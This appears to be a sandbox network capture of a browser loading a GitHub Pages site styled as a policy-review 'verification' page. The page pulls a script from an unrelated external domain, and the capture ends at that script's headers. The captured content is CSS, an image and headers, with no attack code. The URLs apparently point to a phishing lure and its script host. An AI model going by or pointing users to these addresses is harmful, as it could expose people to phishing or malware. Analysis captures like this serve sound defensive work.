                                                                                    Server: GitHub.com
                                                                                    Content-Type: text/css; charset=utf-8
                                                                                    permissions-policy: interest-cohort=()
                                                                                    x-origin-cache: HIT
                                                                                    Last-Modified: Tue, 17 Dec 2024 19:16:51 GMT
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                    ETag: "6761ce23-10ce"
                                                                                    expires: Tue, 17 Dec 2024 23:38:39 GMT
                                                                                    Cache-Control: max-age=600
                                                                                    x-proxy-cache: MISS
                                                                                    X-GitHub-Request-Id: 0A07:1DF966:D05483:E5B2FD:67620927
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 0
                                                                                    Date: Tue, 17 Dec 2024 23:28:39 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-ewr-kewr1740054-EWR
                                                                                    X-Cache: MISS
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1734478119.227723,VS0,VE36
                                                                                    Vary: Accept-Encoding
                                                                                    X-Fastly-Request-ID: 5b3917cf0714902bfbe1d705645768ac20b3fde9
                                                                                    2024-12-17 23:28:39 UTC1378INData Raw: 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 65 67 6f 65 20 55 49 27 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 36 3b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 7d 0a 0a 2e 76 65 72 69 66 69 63 61 74 69 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 64 69
                                                                                    Data Ascii: * { margin: 0; padding: 0; box-sizing: border-box;}body { font-family: 'Segoe UI', Arial, sans-serif; background-color: #f5f5f5; line-height: 1.6; min-height: 100vh;}.verification-container { min-height: 100vh; di
                                                                                    2024-12-17 23:28:39 UTC1378INData Raw: 35 72 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 72 65 6d 3b 0a 7d 0a 0a 2f 2a 20 53 6c 69 64 65 72 20 53 74 79 6c 65 73 20 2a 2f 0a 2e 73 6c 69 64 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 34 38 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 35 66 35 66 35 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 34 70 78 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 30 65 30 65 30 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a
                                                                                    Data Ascii: 5rem; font-size: 0.9rem;}/* Slider Styles */.slider-container { position: relative; height: 48px; background: #f5f5f5; border-radius: 24px; border: 1px solid #e0e0e0; overflow: hidden; cursor: pointer; touch-action:
                                                                                    2024-12-17 23:28:39 UTC1378INData Raw: 64 69 6e 67 3a 20 31 72 65 6d 20 30 3b 0a 7d 0a 0a 2e 6c 6f 61 64 65 72 2d 72 69 6e 67 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 33 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 33 70 78 20 73 6f 6c 69 64 20 23 30 30 37 38 44 34 3b 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 2e 35 72 65 6d 3b 0a 7d 0a 0a 2e
                                                                                    Data Ascii: ding: 1rem 0;}.loader-ring { display: inline-block; width: 30px; height: 30px; border: 3px solid #f3f3f3; border-radius: 50%; border-top: 3px solid #0078D4; animation: spin 1s linear infinite; margin-bottom: 0.5rem;}.
                                                                                    2024-12-17 23:28:39 UTC168INData Raw: 6e 65 63 74 69 6f 6e 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 20 20 67 61 70 3a 20 30 2e 35 72 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6c 6f 67 6f 5b 73 72 63 2a 3d 22 6c 6f 67 6f 2e 63 6c 65 61 72 62 69 74 2e 63 6f 6d 22 5d 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 38 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 32 36 30 70 78 3b 0a 20 20 20 20 7d 0a 7d
                                                                                    Data Ascii: nection-info { flex-direction: column; gap: 0.5rem; } .logo[src*="logo.clearbit.com"] { height: 80px; max-width: 260px; }}


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.449746185.199.108.1534438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:40 UTC713OUTGET /policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/image/logo.png HTTP/1.1
                                                                                    Host: roadmap27.github.io
                                                                                    Connection: keep-alive
                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                    Sec-Fetch-Site: same-origin
                                                                                    Sec-Fetch-Mode: no-cors
                                                                                    Sec-Fetch-Dest: image
                                                                                    Referer: https://roadmap27.github.io/policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:40 UTC717INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    Content-Length: 1057
                                                                                    Server: GitHub.com
                                                                                    Content-Type: image/png
                                                                                    permissions-policy: interest-cohort=()
                                                                                    Last-Modified: Tue, 17 Dec 2024 19:16:51 GMT
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                    ETag: "6761ce23-421"
                                                                                    expires: Tue, 17 Dec 2024 23:38:40 GMT
                                                                                    Cache-Control: max-age=600
                                                                                    x-proxy-cache: MISS
                                                                                    X-GitHub-Request-Id: 52AC:2AB979:C77525:D70AD0:67620928
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 0
                                                                                    Date: Tue, 17 Dec 2024 23:28:40 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-nyc-kteb1890095-NYC
                                                                                    X-Cache: MISS
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1734478121.572566,VS0,VE62
                                                                                    Vary: Accept-Encoding
                                                                                    X-Fastly-Request-ID: 64347492174c4468fcbc52d2bfe562b496e591eb
                                                                                    2024-12-17 23:28:40 UTC1057INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 d3 49 44 41 54 68 de ed 58 4d 4e db 50 10 fe 5c b1 45 f1 0d 92 f6 02 b8 27 20 2c da 2d e9 ba 8b 24 27 c0 48 b3 8f d9 8f 14 73 02 8c d4 ae 31 db 76 51 e7 06 c9 01 aa 9a 13 34 e9 05 d2 cd 0c 1a 06 1b 0c 2d c2 91 3c 92 17 ef f9 fd cc 7b df fc 7c f3 82 3f a3 77 5b 34 94 fd ab 9f 41 f2 3d 68 3c 3e f9 b0 0d d0 c9 7f 95 37 dd 15 74 80 75 f2 82 b2 d7 5d 41 7b 84 88 26 00 06 d2 2c 98 b9 68 05 60 44 34 00 30 31 5d 95 ca d5 1c 04 cc 9c 48 7f 26 fd c9 43 f3 77 00 a8 10 40 01 e0 c0 fd 2a da e2 61 03 00 33 d3 be 03 48 c5 61 52 00 3d cb 67 88 28 02 30 d6 36 80 e1 0e 3b 57 6c c0 da 00 58 02 58 cb f9 47
                                                                                    Data Ascii: PNGIHDRlpHYs~IDAThXMNP\E' ,-$'Hs1vQ4-<{|?w[4A=h<>7tu]A{&,h`D401]H&Cw@*a3HaR=g(06;WlXXG


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.449747104.17.24.144438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:40 UTC581OUTGET /ajax/libs/font-awesome/6.0.0/css/all.min.css HTTP/1.1
                                                                                    Host: cdnjs.cloudflare.com
                                                                                    Connection: keep-alive
                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    Accept: text/css,*/*;q=0.1
                                                                                    Sec-Fetch-Site: cross-site
                                                                                    Sec-Fetch-Mode: no-cors
                                                                                    Sec-Fetch-Dest: style
                                                                                    Referer: https://roadmap27.github.io/
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:40 UTC944INHTTP/1.1 200 OK
                                                                                    Date: Tue, 17 Dec 2024 23:28:40 GMT
                                                                                    Content-Type: text/css; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cache-Control: public, max-age=30672000
                                                                                    ETag: W/"620188b3-468e"
                                                                                    Last-Modified: Mon, 07 Feb 2022 21:01:39 GMT
                                                                                    cf-cdnjs-via: cfworker/kv
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    Timing-Allow-Origin: *
                                                                                    X-Content-Type-Options: nosniff
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 422668
                                                                                    Expires: Sun, 07 Dec 2025 23:28:40 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kNNw7oTkDNS7pljXLc5vL52YP%2Fah4IlSTlN8AJXwDlshYyVlN1T8Ee3RnDvwpHhhPSUuSXaQR0eGW3LgX9LtvPv9ckfVGrcj%2BCVzpaGMqISraau%2F3yexH8bhcv1O4XTZc9OX0YCG"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                    Strict-Transport-Security: max-age=15780000
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8f3ab0de59b8184d-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-12-17 23:28:40 UTC425INData Raw: 37 63 30 30 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 30 2e 30 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 32 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65
                                                                                    Data Ascii: 7c00/*! * Font Awesome Free 6.0.0 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2022 Fonticons, Inc. */.fa{font-family:var(--fa-style
                                                                                    2024-12-17 23:28:40 UTC1369INData Raw: 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 31 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 66 61 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 66 61 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 65 6d 7d
                                                                                    Data Ascii: font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}
                                                                                    2024-12-17 23:28:40 UTC1369INData Raw: 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65
                                                                                    Data Ascii: ull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0);animation-delay:var(--fa-animation-delay,0);-webkit-animation-direction:var(--fa-animation-direction,normal);animation-dire
                                                                                    2024-12-17 23:28:40 UTC1369INData Raw: 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65
                                                                                    Data Ascii: imation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{-webkit-animation-name:fa-fade;animation-name:fa-fade;-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite
                                                                                    2024-12-17 23:28:40 UTC1369INData Raw: 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69
                                                                                    Data Ascii: ection,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animation-duration:var(--fa-animation-duration,1s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infi
                                                                                    2024-12-17 23:28:40 UTC1369INData Raw: 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 7d 2e 66 61 2d 73 70 69 6e 2d 72 65 76
                                                                                    Data Ascii: ar(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-timing-function:var(--fa-animation-timing,linear);animation-timing-function:var(--fa-animation-timing,linear)}.fa-spin-rev
                                                                                    2024-12-17 23:28:40 UTC1369INData Raw: 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74
                                                                                    Data Ascii: ransform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@-webkit-keyframes fa-bounce{0%{-webkit-t
                                                                                    2024-12-17 23:28:40 UTC1369INData Raw: 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 33 30 25 7b 2d 77 65 62 6b 69
                                                                                    Data Ascii: transform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0);transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0)}30%{-webki
                                                                                    2024-12-17 23:28:40 UTC1369INData Raw: 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 2d 77
                                                                                    Data Ascii: -scale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opacity,.4);-webkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125))}}@-w
                                                                                    2024-12-17 23:28:40 UTC1369INData Raw: 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 7d 38 25 2c 32 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 7d 31 32 25 2c 32 38 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 7d 31 36 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f
                                                                                    Data Ascii: rm:rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}8%,24%{-webkit-transform:rotate(-18deg);transform:rotate(-18deg)}12%,28%{-webkit-transform:rotate(18deg);transform:rotate(18deg)}16%{-webkit-transform:ro


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.44974965.109.232.1064438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:41 UTC620OUTGET /animal/script.js HTTP/1.1
                                                                                    Host: www.larkus.ao
                                                                                    Connection: keep-alive
                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    Accept: */*
                                                                                    Sec-Fetch-Site: cross-site
                                                                                    Sec-Fetch-Mode: no-cors
                                                                                    Sec-Fetch-Dest: script
                                                                                    Referer: https://roadmap27.github.io/
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:42 UTC375INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    content-type: text/javascript
                                                                                    last-modified: Fri, 06 Dec 2024 13:37:11 GMT
                                                                                    accept-ranges: bytes
                                                                                    content-length: 12802
                                                                                    date: Tue, 17 Dec 2024 23:28:41 GMT
